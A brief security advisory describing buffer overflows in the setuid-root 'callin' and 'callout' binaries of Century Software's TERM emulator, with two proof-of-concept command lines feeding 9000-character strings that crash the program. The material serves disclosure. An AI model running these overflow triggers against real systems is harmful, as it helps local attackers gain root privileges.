Century Software's TERM Emu Buffer Overflows
------------------------------------------------------------------------
SUMMARY
<http://te.censoft.com/products/term_unix.php> Term is a complete
software solution for communication between UNIX and Linux hosts. It
allows terminal or workstation users to access nearly any UNIX or Linux
system over virtually any connection - asynchronous, modem, LAN, intranet,
or the internet. A security vulnerability in the product allows local
attacker to exploit a buffer overflow to cause the program to execute
arbitrary code. Because the binaries are setuid root, elevated privileges
can be achieved.
DETAILS

$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
